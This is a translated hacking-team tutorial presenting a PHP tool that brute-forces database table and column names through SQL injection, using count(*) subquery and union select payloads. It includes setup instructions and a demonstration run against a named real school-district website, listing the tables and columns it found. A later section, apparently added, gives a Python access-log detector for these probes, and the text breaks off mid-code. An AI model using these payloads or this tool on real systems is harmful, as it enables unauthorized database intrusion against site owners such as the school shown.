Author: mika[est]
Source: Evil Octal Information Security Team
Lately I have been hooked on scripting, hehe ~~~ I had just finished learning PHP and read a few PHP security articles, so I went to Google to find a few sites to practise on.
It turned out that guessing table and column names by hand on PHP sites is really tedious. Scanners like NBSI have a dictionary or brute-force function for guessing table and column names; is there really no way to guess them here? I'm lazy :-).
Then it occurred to me: didn't I just finish learning PHP? Why not put it to use? PHP is not only a web scripting language, it is also a very good command-line interpreted language, and it is easy to write a script with. So that I would not run into this problem again, I wrote a PHP script to guess table and column names. The script is very simple and reads as follows:
```php
<?php
echo "Universal Database tables explode exploit V0.1\n";
echo "written by Mika[est]\n";
// the string that marks a "wrong" page; the second assignment is the one in effect
$keyword = "Warning";
$keyword = "Error";
switch ($argc) {
case 3:   // <url> <dict>: guess table names with a count(*) subquery (Access / MSSQL)
    $u = " and (select count(*) from mika_name)>0";
    $dic = $argv[2];
    break;
case 4:   // <url> <columns> <dict>: guess table names with a union query (MySQL)
    $u = " and 1=1 union select " . implode(",", range(1, $argv[2])) . " from mika_name#";
    $dic = $argv[3];
    break;
case 5:   // <url> -t <table> <dict>: guess column names of <table> with count(column)
    if ($argv[2] != "-t")
        exit("Arguments Error");
    $u = " and (select count(mika_name) from $argv[3])>0#";
    $dic = $argv[4];
    break;
case 6:   // <url> -t <table> <columns> <dict>: guess column names with a union query
    if ($argv[2] != "-t" || $argv[4] < 1)
        exit("Arguments Error");
    if ($argv[4] >= 2) {
        $u = " and 1=1 union select mika_name," . implode(",", range(2, $argv[4])) . " from $argv[3]#";
    } else {
        $u = " and 1=1 union select mika_name from $argv[3]#";
    }
    $dic = $argv[5];
    break;
default:
    echo <<<USAGE
Usage: $argv[0] <url> [options] <dictfile>
Options: number ---> the column count of a table, used during a union query
  e.g.: $argv[0] http://www.aaa.com/bbb.asp?ccc=56 3 mydict.txt
  The URL would be like: .../bbb.asp?ccc=56 and 1=2 union select ... from admin
Options: -t <table> [number] ---> explode the column names of <table>
  e.g.: $argv[0] http://www.aaa.com/bbb.asp?ccc=56 -t admin mydict.txt
Attention: if you don't use [options] the program works in default mode; you can change it in the source code of this program.

USAGE;
    die();
}
$old = $argv[1];
file_exists($dic) or exit("dic file does not exist!");
$words = file($dic);
$curl = curl_init();
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_PROXY, "127.0.0.1:8080");
print "[+] Searching what you want ...\n";
foreach ($words as $word) {
    // print $word;                       // debug output, disabled
    if (preg_match("/^\s*$/", $word)) {   // skip blank dictionary lines
        print "blank\n";
        continue;
    }
    $url = str_replace("mika_name", trim($word), $u);   // substitute the candidate name
    $url = $old . urlencode($url);
    // $url = $old . $url;                // unencoded variant, disabled (would double the prefix)
    curl_setopt($curl, CURLOPT_URL, $url);
    // print "Source URL is: " . $url . "\n";   // debug output, disabled
    $content = curl_exec($curl);
    $new = $content;
    // print $content;                    // debug output, disabled
    if (preg_match("/$keyword/i", $content) == 0) {   // no error keyword: the name exists
        print "[*] FOUND: " . trim($word) . "\n";
    } else {
        print ".";
    }
}
?>
```
Let me explain. The module the program uses is curl, which makes fetching a web page's content very convenient. My PHP is the Windows build, so it comes with a lot of modules, but curl is not enabled by default and you need to turn it on. The method is simple: download the latest zip ("green", no-install) version of PHP, which is easy to carry around, copy php.ini-recommended from the archive into the system directory (the winnt directory on Win2K; the corresponding directory on XP and so on) and rename it to php.ini, then open it in Notepad and find the following line:
```ini
extension_dir =
```
Set its value to your own path. For example, if you unpacked the archive into c:\php, you need to set it to:
```ini
extension_dir = "C:\php\ext"
```
Then keep looking for the following section:
```ini
; Windows Extensions
; Note that ODBC support is built in, so no DLLs are needed for it.
; Note that many DLL files are located in the extensions/ (PHP 4) ext/ (PHP 5)
; extension folders as well as the separate PECL DLL download (PHP 5).
; Be sure to appropriately set the extension_dir directive.
;extension=php_mbstring.dll
;extension=php_bz2.dll
;extension=php_curl.dll
;extension=php_dba.dll
;extension=php_dbase.dll
;extension=php_exif.dll
;extension=php_fdf.dll
;extension=php_filepro.dll
;extension=php_gd2.dll
;extension=php_gettext.dll
;extension=php_ifx.dll
```
See php_curl.dll? Remove the semicolon in front of it and save. That is not all yet: go to the PHP directory and find these two files:
```
libeay32.dll
ssleay32.dll
```
Copy them into the system32 directory and you are done. Very simple, huh? Then add your PHP path to the PATH environment variable so that you can call php.exe from any directory. Installing the other modules follows the same steps, so I won't say more :-)
Back to the point: after the few steps above you can use the curl module. Using the program is simple. Say there is an injectable URL like http://www.aaa.com/bbb.asp?ccc=56 and your dictionary file mydict.txt is in the current directory. Then you run the program like this:
```
php explode.php http://www.aaa.com/bbb.asp?ccc=56 mydict.txt
```
Note that the program does not handle many things, because it is a program I wrote for my own use. It judges by the content the page returns, so you first have to get that content by hand. For example, you can request:
```
http://www.aaa.com/bbb.asp?ccc=56 and (select count(*) from mika520)>0   (on Access and MSSQL)
```
or
```
http://www.aaa.com/bbb.asp?ccc=56 and 1=1 union select 1,2,3,4,5,6 from mika520%23   (on MySQL)
```
mika520 is a table that does not exist, so look at the source of the returned page and pick, from that page for the non-existent table, a string that the correct page does not contain, to use as the keyword (NBSI and the other injection tools use a string from the correct page as the judgement by default; I do it the other way round :-). Then change the value of $keyword on line 4 of the program to your keyword. For example, take the following site:
http://www.elkhart.k12.in.us/content.php?id=157
Because it is PHP, you have to use the second way of guessing, that is, a union query, so first confirm that the injection point exists, then use order by to determine the number of fields. Here I determined that there are 5 fields, so I can use this program to guess. The result is as follows:
```
f:scriptsphpmine>php forcetb1.php http://www.elkhart.k12.in.us/content.php?id=157 5 mydict.txt
Universal Database tables explode exploit V0.1
written by Mika[est]
[+] Searching what you want ...
... [*] FOUND: structure ... ..... ..... .... ..... ..... .... ............................
```
Did you see it? Found a table, hehe. Now look at the fields:
```
f:scriptsphpmine>php forcetb1.php http://www.elkhart.k12.in.us/content.php?id=157 -t structure 5 temp.txt
Universal Database tables explode exploit V0.1
written by Mika[est]
[+] Searching what you want ...
[*] FOUND: division ... [*] FOUND: id . [*] FOUND: level ..... [*] FOUND: title ....
.. [*] FOUND: content . [*] FOUND: parent_id .....
```
Very simple, huh? The 5 in the command is the number of fields you found with order by, i.e. the real count. If it is an Access or MSSQL database, just leave out that field-number argument (the 5 in the example). I won't do more demos.
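From the defender's side, the two probe shapes this script sends (a `count(*)` subquery against a guessed name, or a `union select ... from <name>#`) are easy to pick out of a web server's access log once the query string is URL-decoded, and a client that cycles through many distinct names in a short time is running a dictionary rather than testing one guess. The following is an added example, not code from the original post: the log lines are constructed, and the threshold of three distinct names per client is an assumed tuning value.

```python
# Added example, not from the original post: flag the table/column-name probes the
# script above generates, as they appear in a web server's access log (lines constructed).
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probe shapes the script builds, seen after URL decoding:
#   and (select count(*) from <name>)>0   |   and 1=1 union select 1,2,3 from <name>#
COUNT_PROBE = re.compile(
    r"\band\s*\(\s*select\s+count\s*\(\s*(?:\*|\w+)\s*\)\s+from\s+(\w+)\s*\)\s*>\s*0", re.I)
UNION_PROBE = re.compile(r"\bunion\s+select\b.*?\bfrom\s+(\w+)", re.I)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) ')

def parse_line(line):
    """Return (client_ip, decoded_request_path, status) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, path, status = m.groups()
    return ip, unquote_plus(path), int(status)  # decode '+' and %xx as the server would

def classify(decoded_path):
    """Return (probe_kind, guessed_name) for a probe, or None for an ordinary request."""
    for kind, rx in (("count", COUNT_PROBE), ("union", UNION_PROBE)):
        m = rx.search(decoded_path)
        if m:
            return kind, m.group(1).lower()
    return None

def summarize(lines, threshold=3):
    """Per client: (probe count, distinct names guessed), kept only for clients that
    cycled through >= threshold distinct names, i.e. a dictionary run, not a one-off test."""
    probes, names = defaultdict(int), defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        hit = classify(parsed[1]) if parsed else None
        if hit is None:
            continue
        probes[parsed[0]] += 1
        names[parsed[0]].add(hit[1])
    return {ip: (probes[ip], sorted(names[ip])) for ip in probes if len(names[ip]) >= threshold}

# Constructed sample: one client walks a dictionary, another sends a single manual probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2006:10:00:01 +0000] "GET /content.php?id=157+and+1%3D1+union+select+1%2C2%2C3%2C4%2C5+from+users%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2006:10:00:02 +0000] "GET /content.php?id=157+and+1%3D1+union+select+1%2C2%2C3%2C4%2C5+from+admin%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2006:10:00:03 +0000] "GET /content.php?id=157+and+1%3D1+union+select+1%2C2%2C3%2C4%2C5+from+structure%23 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2006:10:05:00 +0000] "GET /bbb.asp?ccc=56+and+%28select+count%28%2A%29+from+mika520%29%3E0 HTTP/1.1" 500 300',
    '192.0.2.1 - - [01/Jan/2006:10:06:00 +0000] "GET /content.php?id=157 HTTP/1.1" 200 512',
]
```

`summarize(SAMPLE_LOG)` reports only 10.0.0.5 with three names tried; lowering `threshold` to 1 also surfaces the single manual probe from 10.0.0.9.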
If you run into problems along the way, you can change the code; it is very simple :-)
Also, I use an HTTP proxy by default, so you need to modify this line:
```php
curl_setopt($curl, CURLOPT_PROXY, "127.0.0.1:8080");
```
If you don't need a proxy, just comment it out.
In fact, the key is whether your dictionary is good enough; you can combine your usual dictionaries to make a better one, for example take the NBSI and Ghost dictionaries and merge them into one file. But those two dictionaries probably overlap a lot, and to save unnecessary guesses the duplicates need to be removed. I wrote a very simple PHP program to help you remove duplicate lines, as follows:
```php
if ($argc != 2) {
    echo <<<USAGE
Writte
```